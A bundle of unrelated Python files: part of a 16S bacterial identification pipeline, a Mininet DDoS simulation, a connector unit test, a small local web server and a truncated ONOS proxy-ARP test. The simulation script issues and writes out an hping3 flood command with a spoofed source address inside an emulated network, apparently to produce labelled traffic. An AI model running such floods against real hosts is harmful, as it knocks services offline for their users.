sample[self.analysistype].outputdir = os.path.join(sample.run.outputdirectory, self.analysistype)
except AttributeError:
sample[self.analysistype].outputdir = \
os.path.join(sample.general.outputdirectory, self.analysistype)
sample.run.outputdirectory = sample.general.outputdirectory
sample[self.analysistype].logout = os.path.join(sample[self.analysistype].outputdir, 'logout.txt')
sample[self.analysistype].logerr = os.path.join(sample[self.analysistype].outputdir, 'logerr.txt')
sample[self.analysistype].baitedfastq = os.path.join(sample[self.analysistype].outputdir,
'{at}_targetMatches.fastq'
.format(at=self.analysistype))
sample[self.analysistype].complete = False
else:
sample[self.analysistype].runanalysis = False
sample[self.analysistype].targetpath = self.targetpath
sample[self.analysistype].outputdir = 'NA'
sample.run.outputdirectory = 'NA'
class SixteenSSipper(Sippr):
def main(self):
"""
Run the required methods in the appropriate order
"""
self.targets()
self.bait()
# If desired, use bbduk to bait the target sequences with the previously baited FASTQ files
if self.revbait:
self.reversebait()
# Run the bowtie2 read mapping module
self.mapping()
# Use samtools to index the sorted bam file
self.indexing()
# Parse the results
self.parsebam()
def targets(self):
"""
Using the data from the BLAST analyses, set the targets folder, and create the 'mapping file'. This is the
genera-specific FASTA file that will be used for all the reference mapping; it replaces the 'bait file' in the
code
"""
logging.info('Performing analysis with {at} targets folder'.format(at=self.analysistype))
for sample in self.runmetadata:
if sample.general.bestassemblyfile != 'NA':
sample[self.analysistype].targetpath = \
os.path.join(self.targetpath, 'genera', sample[self.analysistype].genus)
# There is a relatively strict databasing scheme necessary for the custom targets. Eventually,
# there will be a helper script to combine individual files into a properly formatted combined file
try:
sample[self.analysistype].mappingfile = glob(os.path.join(sample[self.analysistype].targetpath,
'*.fa'))[0]
# If the fasta file is missing, raise a custom error
except IndexError as e:
# noinspection PyPropertyAccess
e.args = ['Cannot find the combined fasta file in {target_path}. '
'Please note that the file must have a .fa extension'
.format(target_path=sample[self.analysistype].targetpath)]
if os.path.isdir(sample[self.analysistype].targetpath):
raise
else:
sample.general.bestassemblyfile = 'NA'
class SixteenS(object):
def runner(self):
"""
Run the necessary methods in the correct order
"""
logging.info('Starting {} analysis pipeline'.format(self.analysistype))
if not self.pipeline:
# If the metadata has been passed from the method script, self.pipeline must still be false in order to
# get Sippr() to function correctly, but the metadata shouldn't be recreated
try:
_ = vars(self.runmetadata)['samples']
except AttributeError:
# Create the objects to be used in the analyses
objects = Objectprep(self)
objects.objectprep()
self.runmetadata = objects.samples
else:
for sample in self.runmetadata.samples:
setattr(sample, self.analysistype, GenObject())
sample.run.outputdirectory = sample.general.outputdirectory
self.threads = int(self.cpus / len(self.runmetadata.samples)) \
if self.cpus / len(self.runmetadata.samples) > 1 \
else 1
# Use a custom sippr method to use the full reference database as bait, and run mirabait against the FASTQ
# reads - do not perform reference mapping yet
SixteenSBait(self, self.cutoff)
# Subsample 1000 reads from the FASTQ files
self.subsample()
# Convert the subsampled FASTQ files to FASTA format
self.fasta()
# Create BLAST databases if required
self.makeblastdb()
# Run BLAST analyses of the subsampled FASTA files against the NCBI 16S reference database
self.blast()
# Parse the BLAST results
self.blastparse()
# Feed the BLAST results into a modified sippr method to perform reference mapping using the calculated
# genus of the sample as the mapping file
SixteenSSipper(inputobject=self,
cutoff=self.cutoff,
allow_soft_clips=self.allow_soft_clips)
# Create reports
self.reporter()
def subsample(self):
"""
Subsample 1000 reads from the baited files
"""
# Create the threads for the analysis
logging.info('Subsampling FASTQ reads')
for _ in range(self.cpus):
threads = Thread(target=self.subsamplethreads, args=())
threads.setDaemon(True)
threads.start()
with progressbar(self.runmetadata.samples) as bar:
for sample in bar:
if sample.general.bestassemblyfile != 'NA':
# Set the name of the subsampled FASTQ file
sample[self.analysistype].subsampledfastq = \
os.path.splitext(sample[self.analysistype].baitedfastq)[0] + '_subsampled.fastq'
# Set the system call
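# (Despite the attribute name 'seqtkcall', the call below uses reformat.sh
# from BBMap with samplereadstarget=1000 to subsample the reads.)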
sample[self.analysistype].seqtkcall = 'reformat.sh in={baited} out={subsampled} ' \
'samplereadstarget=1000'\
.format(baited=sample[self.analysistype].baitedfastq,
subsampled=sample[self.analysistype].subsampledfastq)
# Add the sample to the queue
self.samplequeue.put(sample)
self.samplequeue.join()
def subsamplethreads(self):
while True:
sample = self.samplequeue.get()
# Check to see if the subsampled FASTQ file has already been created
if not os.path.isfile(sample[self.analysistype].subsampledfastq):
# Run the system call
out, err = run_subprocess(sample[self.analysistype].seqtkcall)
write_to_logfile(sample[self.analysistype].seqtkcall,
sample[self.analysistype].seqtkcall,
self.logfile, sample.general.logout, sample.general.logerr,
sample[self.analysistype].logout, sample[self.analysistype].logerr)
write_to_logfile(out,
err,
self.logfile, sample.general.logout, sample.general.logerr,
sample[self.analysistype].logout, sample[self.analysistype].logerr)
self.samplequeue.task_done()
def fasta(self):
"""
Convert the subsampled reads to FASTA format using reformat.sh
"""
logging.info('Converting FASTQ files to FASTA format')
# Create the threads for the analysis
for _ in range(self.cpus):
threads = Thread(target=self.fastathreads, args=())
threads.setDaemon(True)
threads.start()
with progressbar(self.runmetadata.samples) as bar:
for sample in bar:
if sample.general.bestassemblyfile != 'NA':
# Set the name as the FASTA file - the same as the FASTQ, but with .fa file extension
sample[self.analysistype].fasta = \
os.path.splitext(sample[self.analysistype].subsampledfastq)[0] + '.fa'
# Set the system call
sample[self.analysistype].reformatcall = 'reformat.sh in={fastq} out={fasta}'\
.format(fastq=sample[self.analysistype].subsampledfastq,
fasta=sample[self.analysistype].fasta)
# Add the sample to the queue
self.fastaqueue.put(sample)
self.fastaqueue.join()
def fastathreads(self):
while True:
sample = self.fastaqueue.get()
# Check to see if the FASTA file already exists
if not os.path.isfile(sample[self.analysistype].fasta):
# Run the system call
out, err = run_subprocess(sample[self.analysistype].reformatcall)
write_to_logfile(sample[self.analysistype].reformatcall,
sample[self.analysistype].reformatcall,
self.logfile, sample.general.logout, sample.general.logerr,
sample[self.analysistype].logout, sample[self.analysistype].logerr)
write_to_logfile(out,
err,
self.logfile, sample.general.logout, sample.general.logerr,
sample[self.analysistype].logout, sample[self.analysistype].logerr)
self.fastaqueue.task_done()
def makeblastdb(self):
"""
Makes blast database files from targets as necessary
"""
# Iterate through the samples to set the bait file.
for sample in self.runmetadata.samples:
if sample.general.bestassemblyfile != 'NA':
# Remove the file extension
db = os.path.splitext(sample[self.analysistype].baitfile)[0]
# Add '.nhr' for searching below
nhr = '{db}.nhr'.format(db=db)
# Check for already existing database files
if not os.path.isfile(str(nhr)):
# Create the databases
command = 'makeblastdb -in {bait} -parse_seqids -max_file_sz 2GB -dbtype nucl -out {out}'\
.format(bait=sample[self.analysistype].baitfile,
out=db)
out, err = run_subprocess(command)
write_to_logfile(out=command,
err=command,
logfile=self.logfile,
samplelog=sample.general.logout,
sampleerr=sample.general.logerr,
analysislog=sample[self.analysistype].logout,
analysiserr=sample[self.analysistype].logerr)
write_to_logfile(out=out,
err=err,
logfile=self.logfile,
samplelog=sample.general.logout,
sampleerr=sample.general.logerr,
analysislog=sample[self.analysistype].logout,
analysiserr=sample[self.analysistype].logerr)
def blast(self):
"""
Run BLAST analyses of the subsampled FASTQ reads against the NCBI 16S reference database
"""
logging.info('BLASTing FASTA files against {at} database'.format(at=self.analysistype))
for _ in range(self.cpus):
threads = Thread(target=self.blastthreads, args=())
threads.setDaemon(True)
threads.start()
with progressbar(self.runmetadata.samples) as bar:
for sample in bar:
if sample.general.bestassemblyfile != 'NA':
# Set the name of the BLAST report
sample[self.analysistype].blastreport = os.path.join(
sample[self.analysistype].outputdir,
'{sn}_{at}_blastresults.csv'.format(sn=sample.name,
at=self.analysistype))
# Use the NCBI BLASTn command line wrapper module from BioPython to set the parameters of the search
blastn = NcbiblastnCommandline(query=sample[self.analysistype].fasta,
db=os.path.splitext(sample[self.analysistype].baitfile)[0],
max_target_seqs=1,
num_threads=self.threads,
outfmt="6 qseqid sseqid positive mismatch gaps evalue bitscore "
"slen length qstart qend qseq sstart send sseq",
out=sample[self.analysistype].blastreport)
# Add a string of the command to the metadata object
sample[self.analysistype].blastcall = str(blastn)
# Add the object and the command to the BLAST queue
self.blastqueue.put((sample, blastn))
self.blastqueue.join()
def blastthreads(self):
while True:
sample, blastn = self.blastqueue.get()
if not os.path.isfile(sample[self.analysistype].blastreport):
# Ensure that the query file exists; this can happen with very small .fastq files
if os.path.isfile(sample[self.analysistype].fasta):
# Perform the BLAST analysis
try:
blastn()
except Bio.Application.ApplicationError:
sample[self.analysistype].blastreport = str()
self.blastqueue.task_done()
def blastparse(self):
"""
Parse the blast results, and store necessary data in dictionaries in sample object
"""
logging.info('Parsing BLAST results')
# Load the NCBI 16S reference database as a dictionary
for sample in self.runmetadata.samples:
if sample.general.bestassemblyfile != 'NA':
# Load the NCBI 16S reference database as a dictionary
dbrecords = SeqIO.to_dict(SeqIO.parse(sample[self.analysistype].baitfile, 'fasta'))
# Allow for no BLAST results
if os.path.isfile(sample[self.analysistype].blastreport):
# Initialise a dictionary to store the number of times a genus is the best hit
sample[self.analysistype].frequency = dict()
# Open the sequence profile file as a dictionary
blastdict = DictReader(open(sample[self.analysistype].blastreport),
fieldnames=self.fieldnames, dialect='excel-tab')
recorddict = dict()
for record in blastdict:
# Create the subject id. It will look like this: gi|1018196593|ref|NR_136472.1|
subject = record['subject_id']
# Extract the genus name. Use the subject id as a key in the dictionary of the reference db.
# It will return the full record e.g. gi|1018196593|ref|NR_136472.1| Escherichia marmotae
# strain HT073016 16S ribosomal RNA, partial sequence
# This full description can be manipulated to extract the genus e.g. Escherichia
genus = dbrecords[subject].description.split('|')[-1].split()[0]
# Increment the number of times this genus was found, or initialise the dictionary with this
# genus the first time it is seen
try:
sample[self.analysistype].frequency[genus] += 1
except KeyError:
sample[self.analysistype].frequency[genus] = 1
try:
recorddict[dbrecords[subject].description] += 1
except KeyError:
recorddict[dbrecords[subject].description] = 1
# Sort the dictionary based on the number of times a genus is seen
sample[self.analysistype].sortedgenera = sorted(sample[self.analysistype].frequency.items(),
key=operator.itemgetter(1), reverse=True)
try:
# Extract the top result, and set it as the genus of the sample
sample[self.analysistype].genus = sample[self.analysistype].sortedgenera[0][0]
# Previous code relies on having the closest refseq genus, so set this as above
# sample.general.closestrefseqgenus = sample[self.analysistype].genus
except IndexError:
# Populate attributes with 'ND'
sample[self.analysistype].sortedgenera = 'ND'
sample[self.analysistype].genus = 'ND'
else:
# Populate attributes with 'ND'
sample[self.analysistype].sortedgenera = 'ND'
sample[self.analysistype].genus = 'ND'
else:
# Populate attributes with 'ND'
sample[self.analysistype].sortedgenera = 'ND'
sample[self.analysistype].genus = 'ND'
def reporter(self):
"""
Creates a report of the results
"""
# Create the path in which the reports are stored
make_path(self.reportpath)
logging.info('Creating {at} report'.format(at=self.analysistype))
# Initialise the header and data strings
header = 'Strain,Gene,PercentIdentity,Genus,FoldCoverage\n'
data = ''
with open(self.sixteens_report, 'w') as report:
with open(os.path.join(self.reportpath, self.analysistype + '_sequences.fa'), 'w') as sequences:
for sample in self.runmetadata.samples:
# Initialise necessary attributes
sample[self.analysistype].sixteens_match = 'ND'
sample[self.analysistype].species = 'ND'
sample[self.analysistype].percent_id = 'ND'
try:
# Select the best hit of all the full-length 16S genes mapped - for 16S use the hit with the
# fewest number of SNPs rather than the highest percent identity
sample[self.analysistype].besthit = sorted(sample[self.analysistype].resultssnp.items(),
key=operator.itemgetter(1))[0][0]
# Parse the baited FASTA file to pull out the description of the hit
for record in SeqIO.parse(sample[self.analysistype].baitfile, 'fasta'):
# If the best hit e.g. gi|631251361|ref|NR_112558.1| is present in the current record,
# gi|631251361|ref|NR_112558.1| Escherichia coli strain JCM 1649 16S ribosomal RNA ...,
# extract the match and the species
if sample[self.analysistype].besthit in record.id:
# Set the best match and species from the records
sample[self.analysistype].sixteens_match = record.description.split(' 16S')[0]
sample[self.analysistype].species = \
sample[self.analysistype].sixteens_match.split('|')[-1].split()[1]
# Add the sample name to the data string
data += sample.name + ','
# Find the record that matches the best hit, and extract the necessary values to be placed
# in the data string
for name, identity in sample[self.analysistype].results.items():
if name == sample[self.analysistype].besthit:
data += '{gene},{id},{genus},{depth}\n'.format(gene=sample[self.analysistype]
.sixteens_match,
id=identity,
genus=sample[self.analysistype].genus,
depth=sample[self.analysistype]
.avgdepth[name])
# Update the identity attribute
sample[self.analysistype].percent_id = identity
# Create a FASTA-formatted sequence output of the 16S sequence
record = SeqRecord(Seq(sample[self.analysistype].sequences[name]),
id='{sn}_16S'.format(sn=sample.name),
description='')
SeqIO.write(record, sequences, 'fasta')
except (AttributeError, IndexError):
data += '{sn}\n'.format(sn=sample.name)
# Write the results to the report
report.write(header)
report.write(data)
def report_parse(self):
"""
Rather than re-performing analyses, parse the report, and populate metadata objects
"""
test = SixteenSBait(self)
test.targets()
with open(self.sixteens_report, 'r') as report:
for line in report:
try:
strain, sixteens, pid, genus, fold_coverage = line.split(',')
except ValueError:
strain = line.rstrip()
genus = 'NA'
sixteens = str()
pid = '0'
fold_coverage = '0'
for sample in self.runmetadata.samples:
if sample.name == strain:
if not hasattr(sample.general, 'closestrefseqgenus'):
sample.general.closestrefseqgenus = genus
if not hasattr(sample.general, 'referencegenus'):
sample.general.referencegenus = genus
sample[self.analysistype].genus = genus
sample[self.analysistype].avgdepth = dict()
sample[self.analysistype].avgdepth[sixteens] = fold_coverage.rstrip()
sample[self.analysistype].sixteens_match = sixteens
sample[self.analysistype].percent_id = pid
if genus != 'NA':
sample[self.analysistype].results = {sixteens: pid}
else:
sample[self.analysistype].results = dict()
sequences = SeqIO.parse(self.sixteens_sequences, 'fasta')
for record in sequences:
name = record.id.split('_16S')[0]
for sample in self.runmetadata.samples:
if name == sample.name:
sample[self.analysistype].sequences = dict()
for sixteens in sample[self.analysistype].avgdepth:
sample[self.analysistype].sequences[sixteens] = str(record.seq)
for sample in self.runmetadata.samples:
if not hasattr(sample[self.analysistype], 'sequences'):
sample[self.analysistype].sequences = dict()
if not hasattr(sample[self.analysistype], 'sixteens_match') or not sample[self.analysistype].sixteens_match:
sample[self.analysistype].sixteens_match = 'ND'
def __init__(self, args, pipelinecommit, startingtime, scriptpath, analysistype, cutoff, allow_soft_clips=False):
"""
:param args: command line arguments
:param pipelinecommit: pipeline commit or version
:param startingtime: time the script was started
:param scriptpath: home path of the script
:param analysistype: name of the analysis being performed - allows the program to find databases
:param cutoff: percent identity cutoff for matches
:param allow_soft_clips: Boolean whether the BAM parsing should exclude sequences with internal soft clips
"""
# Initialise variables
self.commit = str(pipelinecommit)
self.starttime = startingtime
self.homepath = scriptpath
self.analysistype = analysistype
# Define variables based on supplied arguments
try:
self.path = os.path.join(args.outputpath)
except AttributeError:
self.path = os.path.join(args.path)
assert os.path.isdir(self.path), 'Supplied path is not a valid directory {0!r:s}'.format(self.path)
try:
self.sequencepath = os.path.join(args.sequencepath)
except AttributeError:
self.sequencepath = self.path
assert os.path.isdir(self.sequencepath), 'Sequence path is not a valid directory {0!r:s}' \
.format(self.sequencepath)
try:
self.targetpath = os.path.join(args.referencefilepath, self.analysistype)
except AttributeError:
self.targetpath = os.path.join(args.reffilepath, self.analysistype)
try:
self.reportpath = args.reportpath
except AttributeError:
self.reportpath = os.path.join(self.path, 'reports')
assert os.path.isdir(self.targetpath), 'Target path is not a valid directory {0!r:s}' \
.format(self.targetpath)
try:
self.bcltofastq = args.bcltofastq
except AttributeError:
self.bcltofastq = False
try:
self.miseqpath = args.miseqpath
except AttributeError:
self.miseqpath = str()
try:
self.miseqfolder = args.miseqfolder
except AttributeError:
self.miseqfolder = str()
try:
self.portallog = args.portallog
except AttributeError:
self.portallog = os.path.join(self.path, 'portal.log')
try:
self.fastqdestination = args.fastqdestination
except AttributeError:
self.fastqdestination = str()
self.logfile = args.logfile
try:
self.forwardlength = args.forwardlength
except AttributeError:
self.forwardlength = 'full'
try:
self.reverselength = args.reverselength
except AttributeError:
self.reverselength = 'full'
self.numreads = 2 if self.reverselength != 0 else 1
try:
self.customsamplesheet = args.customsamplesheet
except AttributeError:
self.customsamplesheet = False
# Set the custom cutoff value
self.cutoff = cutoff
# Use the argument for the number of threads to use, or default to the number of cpus in the system
self.cpus = int(args.cpus if args.cpus else multiprocessing.cpu_count())
self.threads = int()
self.runmetadata = args.runmetadata
self.pipeline = args.pipeline
try:
self.copy = args.copy
except AttributeError:
self.copy = False
self.revbait = True
self.allow_soft_clips = allow_soft_clips
self.devnull = open(os.path.devnull, 'w')
self.samplequeue = Queue(maxsize=self.cpus)
self.fastaqueue = Queue(maxsize=self.cpus)
self.blastqueue = Queue(maxsize=self.cpus)
self.baitfile = str()
self.taxonomy = {'Escherichia': 'coli', 'Listeria': 'monocytogenes', 'Salmonella': 'enterica'}
# Fields used for custom outfmt 6 BLAST output:
self.fieldnames = ['query_id', 'subject_id', 'positives', 'mismatches', 'gaps',
'evalue', 'bit_score', 'subject_length', 'alignment_length',
'query_start', 'query_end', 'query_sequence',
'subject_start', 'subject_end', 'subject_sequence']
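# These field names mirror the column order of the custom outfmt 6 string
# passed to blastn in blast(), so the DictReader in blastparse() lines up.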
#
self.sixteens_report = os.path.join(self.reportpath, self.analysistype + '.csv')
self.sixteens_sequences = os.path.join(self.reportpath, self.analysistype + '_sequences.fa')
if not os.path.isfile(self.sixteens_report):
# Run the analyses
self.runner()
else:
self.report_parse()
if __name__ == '__main__':
# Argument parser for user-inputted values, and a nifty help menu
# Get the current commit of the pipeline from git
# Extract the path of the current script from the full path + file name
homepath = os.path.split(os.path.abspath(__file__))[0]
# Find the commit of the script by running a command to change to the directory containing the script and run
# a git command to return the short version of the commit hash
commit = Popen('cd {} && git rev-parse --short HEAD'.format(homepath),
shell=True, stdout=PIPE).communicate()[0].rstrip()
# Parser for arguments
parser = ArgumentParser(description='Perform modelling of parameters for GeneSipping')
parser.add_argument('-o', '--outputpath',
required=True,
help='Path to directory in which report folder is to be created')
parser.add_argument('-s', '--sequencepath',
required=True,
help='Path of .fastq(.gz) files to process.')
parser.add_argument('-r', '--referencefilepath',
help='Provide the location of the folder containing the pipeline accessory files (reference '
'genomes, MLST data, etc.)')
parser.add_argument('-n', '--cpus',
help='Number of threads. Default is the number of cores in the system')
parser.add_argument('-b', '--bcltofastq',
action='store_true',
help='Optionally run bcl2fastq on an in-progress Illumina MiSeq run. Must include:'
'miseqpath, and miseqfolder arguments, and optionally readlengthforward, '
'readlengthreverse, and projectName arguments.')
parser.add_argument('-m', '--miseqpath',
help='Path of the folder containing MiSeq run data folder')
parser.add_argument('-f', '--miseqfolder',
help='Name of the folder containing MiSeq run data')
parser.add_argument('-d', '--fastqdestination',
help='Optional folder path to store .fastq files created using the fastqCreation module. '
'Defaults to path/miseqfolder')
parser.add_argument('-r1', '--forwardlength',
default='full',
help='Length of forward reads to use. Can specify "full" to take the full length of '
'forward reads specified on the SampleSheet')
parser.add_argument('-r2', '--reverselength',
default='full',
help='Length of reverse reads to use. Can specify "full" to take the full length of '
'reverse reads specified on the SampleSheet')
parser.add_argument('-c', '--customsamplesheet',
help='Path of folder containing a custom sample sheet (still must be named "SampleSheet.csv")')
parser.add_argument('-P', '--projectName',
help='A name for the analyses. If nothing is provided, then the "Sample_Project" field '
'in the provided sample sheet will be used. Please note that bcl2fastq creates '
'subfolders using the project name, so if multiple names are provided, the results '
'will be split into multiple projects')
parser.add_argument('-D', '--detailedReports',
action='store_true',
help='Provide detailed reports with percent identity and depth of coverage values '
'rather than just "+" for positive results')
parser.add_argument('-u', '--cutoff',
default=0.8,
help='Custom cutoff values')
parser.add_argument('-C', '--copy',
action='store_true',
help='Normally, the program will create symbolic links of the files into the sequence path, '
'however, there are occasions when it is necessary to copy the files instead')
# Get the arguments into an object
arguments = parser.parse_args()
arguments.pipeline = False
arguments.runmetadata = MetadataObject()
arguments.logfile = os.path.join(arguments.outputpath, 'logfile')
arguments.analysistype = 'sixteens_full'
# Define the start time
start = time.time()
# Run the script
SixteenS(arguments, commit, start, homepath, arguments.analysistype, arguments.cutoff)
# Print a bold, green exit statement
print('\033[92m' + '\033[1m' + "\nElapsed Time: %0.2f seconds" % (time.time() - start) + '\033[0m')
|
tree_topology.py
|
from mininet.net import Mininet
from mininet.topolib import TreeTopo
from mininet.node import Controller, RemoteController,OVSSwitch
import random
import threading
# Create and start mininet topology
tree_topo = TreeTopo(depth=3, fanout=2)
net = Mininet(topo=tree_topo, controller=RemoteController,switch=OVSSwitch)
net.start()
episode_count = 100
episode_length = 10
no_of_hosts = 8
victim_host_ip = '10.0.0.' + str(no_of_hosts)
spoofed_ip = '10.1.1.1'
# Command line tool hping3 is used to simulate DDoS
def ddos_flood(host):
# Flood the victim host (victim_host_ip, i.e. the last host 10.0.0.8) with spoofed-source packets
# The timeout command aborts hping3 after the attack has run for the specified episode length
host.cmd('timeout ' + str(episode_length) + 's hping3 --flood ' + ' -a '+ spoofed_ip +' '+ victim_host_ip)
host.cmd('killall hping3')
def ddos_benign(host):
# Send benign packets to victim
host.cmd('timeout ' + str(episode_length) + 's hping3 ' + victim_host_ip)
host.cmd('killall hping3')
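# Example of the flood command issued by ddos_flood for one 10-second
# episode (victim 10.0.0.8, spoofed source 10.1.1.1):
#   timeout 10s hping3 --flood -a 10.1.1.1 10.0.0.8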
# In each episode, randomly select an attacker and a benign user
for i in range(episode_count):
print("Episode "+str(i))
attacking_host_id = random.randint(0, no_of_hosts - 2) # random host index, excluding the victim (the last host)
attacking_host = net.hosts[attacking_host_id]
benign_host_id = random.choice([i for i in range(0, no_of_hosts - 2) if i not in [attacking_host_id]])
benign_host = net.hosts[benign_host_id]
print("host" + str(attacking_host_id) + " is attacking and host" + str(benign_host_id) + " is sending normal requests")
# Create separate threads for the attacker and the benign user
t1 = threading.Thread(target=ddos_benign, args=(benign_host,))
t2 = threading.Thread(target=ddos_flood, args=(attacking_host,))
t1.start()
t2.start()
t1.join()
t2.join()
net.stop()
|
test_connector.py
|
import unittest
from cbint.utils.detonation import DetonationDaemon, CbAPIProducerThread
from cbint.utils.detonation.binary_analysis import DeepAnalysisThread
from cbopensource.connectors.lastline.bridge import LastlineConnector, LastlineProvider
import os
import sys
import tempfile
from time import sleep
import multiprocessing
import socket
import threading
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from utils.mock_server import get_mocked_server
test_dir = os.path.dirname(os.path.abspath(__file__))
class ServerNeverWokeUpError(Exception):
pass
def sleep_till_available(conn_tuple):
num_retries = 5
while num_retries:
s = socket.socket()
try:
s.connect(conn_tuple)
except socket.error:
num_retries -= 1
sleep(.1)
else:
return
raise ServerNeverWokeUpError(conn_tuple)
class LastlineTest(unittest.TestCase):
def setUp(self):
self.temp_directory = tempfile.mkdtemp()
config_path = os.path.join(test_dir, "data", "daemon.conf")
mydir = os.path.dirname(os.path.abspath(__file__))
binaries_dir = os.path.join(mydir, 'data', 'binary_data')
self.mock_server = get_mocked_server(binaries_dir)
self.mock_server_thread = threading.Thread(target=self.mock_server.run, args=['127.0.0.1', 7982])
self.mock_server_thread.daemon = True
self.mock_server_thread.start()
sleep_till_available(('127.0.0.1', 7982))
self.daemon = LastlineConnector('lastline-test',
configfile=config_path, work_directory=self.temp_directory,
logfile=os.path.join(self.temp_directory, 'test.log'), debug=True)
self.daemon.validate_config()
self.daemon.initialize_queue()
def test_lastline(self):
CbAPIProducerThread(self.daemon.work_queue, self.daemon.cb, self.daemon.name, rate_limiter=0,
stop_when_done=True).run()
dirty_flag = threading.Event()
t = DeepAnalysisThread(self.daemon.work_queue, self.daemon.cb, self.daemon.get_provider(),
dirty_event=dirty_flag)
t.start()
unanalyzed = self.daemon.work_queue.number_unanalyzed()
while unanalyzed:
print(unanalyzed)
sleep(.1)
unanalyzed = self.daemon.work_queue.number_unanalyzed()
t.stop()
t.join()
|
webui.py
|
import email.utils
import hashlib
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer
import mimetypes
import os
import random
import threading
import time
import webbrowser
def start_server(
server_port=8080,
public_html_path=os.path.realpath(os.path.join(
os.path.dirname(__file__),
'..',
'public_html',
)),
):
"""launch simple http server"""
instance_hash = hashlib.new('SHA256', (
str(time.time()) +
str(random.random()) +
str(random.random())
).encode('utf-8')).hexdigest()
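# Requests are expected as /<instance_hash>/<relative path>; the handlers
# below strip the leading slash and hash before resolving the path against
# public_html_path.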
class OLZResultsRequestHandler(BaseHTTPRequestHandler):
def do_GET(self): # noqa: N802
if self.path == '/echo':
self.send_response(200)
self.end_headers()
self.wfile.write(b'echo')
return
file_path = os.path.join(
public_html_path,
self.path[2 + len(instance_hash):],
)
try:
file_path = file_path[:file_path.rindex('?')]
except ValueError:
pass
if os.path.isfile(file_path):
self.send_response(200)
file_type, encoding = mimetypes.guess_type(file_path)
file_date = email.utils.formatdate(os.path.getmtime(file_path))
self.send_header('Content-type', file_type)
self.send_header('Last-modified', file_date)
h = hashlib.sha256()
with open(file_path, 'rb') as fp:
h.update(fp.read())
self.send_header('ETag', h.hexdigest())
self.end_headers()
with open(file_path, 'rb') as fp:
self.wfile.write(fp.read())
else:
self.send_response(404)
self.end_headers()
self.wfile.write(b"HTTP Error 404: Not Found")
def do_HEAD(self): # noqa: N802
if self.path == '/echo':
self.send_response(200)
self.end_headers()
return
file_path = os.path.join(
public_html_path,
self.path[2 + len(instance_hash):],
)
try:
file_path = file_path[:file_path.rindex('?')]
except ValueError:
pass
if os.path.isfile(file_path):
self.send_response(200)
file_type, encoding = mimetypes.guess_type(file_path)
file_date = email.utils.formatdate(os.path.getmtime(file_path))
self.send_header('Content-type', file_type)
self.send_header('Last-modified', file_date)
h = hashlib.sha256()
with open(file_path, 'rb') as fp:
h.update(fp.read())
self.send_header('ETag', h.hexdigest())
self.end_headers()
else:
self.send_response(404)
self.end_headers()
httpd = HTTPServer(("", server_port), OLZResultsRequestHandler)
print("serving at port {0}".format(server_port))
def serve_forever(httpd):
httpd.serve_forever()
httpd.server_thread = threading.Thread(target=serve_forever, args=(httpd,))
httpd.instance_hash = instance_hash
httpd.server_thread.start()
return httpd
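# Typical usage (a sketch; 'index.html' stands in for a real page under
# public_html_path):
#   httpd = start_server(8080)
#   start_webbrowser(8080, httpd.instance_hash, 'index.html')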
def start_webbrowser(
server_port,
instance_hash,
server_path,
):
try:
httpc = HTTPConnection("localhost", server_port, timeout=10)
httpc.request("GET", "/echo")
resp = httpc.getresponse()
resp.read()
httpc.close()
except:
print("Server did not start, aborting...")
return
webbrowser.open(
'http://localhost:' + str(server_port) + '/' +
instance_hash + '/' + server_path,
)
|
proxyarpTest.py
|
# Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright 2016-present Ciena Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from nose.tools import *
from scapy.all import *
from CordTestUtils import get_mac, log_test
from OnosCtrl import OnosCtrl
from OltConfig import OltConfig
from OnosFlowCtrl import OnosFlowCtrl
from onosclidriver import OnosCliDriver
from CordContainer import Container, Onos, Quagga
from CordTestServer import cord_test_onos_restart, cord_test_quagga_restart
from portmaps import g_subscriber_port_map
import threading
from threading import current_thread
import time
import os
import json
log_test.setLevel('INFO')
class proxyarp_exchange(unittest.TestCase):
apps = ('org.onosproject.vrouter','org.onosproject.proxyarp')
device_id = 'of:' + get_mac()
device_dict = { "devices" : {
"{}".format(device_id) : {
"basic" : {
"driver" : "softrouter"
}
}
},
}
test_path = os.path.dirname(os.path.realpath(__file__))
onos_config_path = os.path.join(test_path, '..', 'setup/onos-config')
GATEWAY = '192.168.10.50'
INGRESS_PORT = 1
EGRESS_PORT = 2
MAX_PORTS = 100
hosts_list = [ ('192.168.10.1', '00:00:00:00:00:01'), ('192.168.11.1', '00:00:00:00:02:01'), ]
@classmethod
def setUpClass(cls):
cls.olt = OltConfig()
cls.port_map, _ = cls.olt.olt_port_map()
if not cls.port_map:
cls.port_map = g_subscriber_port_map
time.sleep(3)
cls.load_device_id()
@classmethod
def tearDownClass(cls):
'''Deactivate the vrouter apps'''
#cls.vrouter_host_unload()
@classmethod
def load_device_id(cls):
did = OnosCtrl.get_device_id()
cls.device_id = did
cls.device_dict = { "devices" : {
"{}".format(did) : {
"basic" : {
"driver" : "softrouter"
}
}
},
}
def cliEnter(self):
retries = 0
while retries < 3:
self.cli = OnosCliDriver(connect = True)
if self.cli.handle:
break
else:
retries += 1
time.sleep(2)
def cliExit(self):
self.cli.disconnect()
@classmethod
def proxyarp_host_unload(cls):
index = 1
for host,_ in cls.hosts_list:
iface = cls.port_map[index]
index += 1
config_cmds = ('ifconfig {} 0'.format(iface), )
for cmd in config_cmds:
log_test.info('host unload command %s' % cmd)
os.system(cmd)
@classmethod
def interface_config_load(cls, interface_cfg = None):
if type(interface_cfg) is tuple:
res = []
for v in interface_cfg:
if type(v) == list:
pass
else:
res += v.items()
config = dict(res)
else:
config = interface_cfg
cfg = json.dumps(config)
with open('{}/network-cfg.json'.format(cls.onos_config_path), 'w') as f:
f.write(cfg)
return cord_test_onos_restart()
@classmethod
def host_config_load(cls, host_config = None):
for host in host_config:
status, code = OnosCtrl.host_config(host)
if status is False:
log_test.info('JSON request returned status %d' %code)
